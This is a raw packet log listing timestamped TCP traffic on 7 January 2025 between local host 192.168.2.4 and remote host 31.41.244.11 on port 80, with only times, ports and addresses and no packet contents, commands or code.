Jan 7, 2025 10:09:00.751882076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751893997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751893997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751908064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751918077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751928091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751936913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751939058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751939058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751962900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752015114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752033949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752053976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752063990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752083063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752099037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752120972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752131939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752142906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752182961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752186060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752194881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752201080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752207994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752258062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752258062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752448082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752490997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752509117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752521038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752548933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752548933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752548933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752558947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752578974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752583027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752599001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752610922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752619028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752619028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752640009 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752671003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752679110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752681971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752695084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752706051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752715111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752743006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752763033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752763033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752775908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752777100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752790928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.752821922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.752861977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.753206968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753246069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753256083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753261089 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.753268957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753309965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.753309965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.753400087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753412962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753423929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753436089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753448009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753460884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.753489971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.753529072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.753561020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753580093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753597021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753608942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753609896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.753621101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753623962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.753633976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753644943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.753647089 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.753715992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.757230043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.784323931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784344912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784358025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784384966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784423113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784440041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784441948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.784452915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784465075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784475088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.784538984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.784554005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784565926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784578085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784588099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784607887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784621000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784630060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.784630060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.784631968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784643888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784674883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.784687996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784697056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784708023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784718990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.784753084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784763098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784771919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.784771919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.784775019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784787893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784802914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.784822941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.784847975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784857035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.784887075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.784887075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.819180965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.819196939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.819209099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.819238901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.819252968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.819284916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.819293976 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.819298983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.819305897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.819340944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.819340944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837248087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837275028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837282896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837321997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837321997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837332964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837349892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837359905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837371111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837380886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837403059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837435961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837435961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837610960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837646961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837655067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837675095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837694883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837694883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837698936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837709904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837735891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837758064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837785006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837795019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837805986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837825060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837826014 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837837934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837846994 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837862968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837871075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837881088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.837891102 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837925911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.837925911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838074923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838085890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838094950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838103056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838113070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838119030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838129997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838140011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838150978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838161945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838171959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838174105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838174105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838182926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838212967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838212967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838258028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838301897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838311911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838321924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838331938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838340998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838351011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838359118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838359118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838367939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838376999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838403940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838418961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838462114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838483095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838491917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838502884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838512897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838524103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838548899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838548899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838581085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838608980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838656902 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838716030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838727951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838736057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838746071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838757038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838768005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838778973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838788033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838792086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838802099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838840961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838840961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838865995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838876963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838911057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838918924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838923931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838933945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.838956118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838956118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.838975906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839046001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839056969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839066029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839107037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839107037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839133978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839167118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839176893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839204073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839210033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839215040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839226007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839235067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839262009 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839329958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839348078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839366913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839371920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839402914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839423895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839423895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839443922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839466095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839474916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839484930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839514017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839533091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839544058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839555025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839565039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839575052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839607954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839607954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839627981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839927912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839936972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839942932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839957952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839967966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.839987993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.839987993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.840018988 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.840029955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.840040922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.840071917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.840080023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.840109110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.840109110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.840390921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.840399027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.840411901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.840421915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.840432882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.840441942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.840450048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.840451002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.840451956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.840461016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.840502977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.840508938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.840508938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.840550900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.871187925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871202946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871220112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871258020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.871258020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.871356010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871367931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871377945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871388912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871407032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871417999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871432066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.871432066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.871454000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.871463060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871474981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871484995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871495008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871495008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.871507883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871520042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.871520042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.871633053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.871663094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871675968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871685028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871695042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871712923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.871714115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871726036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871737957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871742964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.871747971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.871773005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.871789932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.897918940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.897943974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.897953987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.898001909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.898010969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.898013115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.898010969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.898049116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.898109913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.898123980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.898169041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.898171902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.898181915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.898247004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.898247004 CET	50017	80	192.168.2.4	31.41.244.11
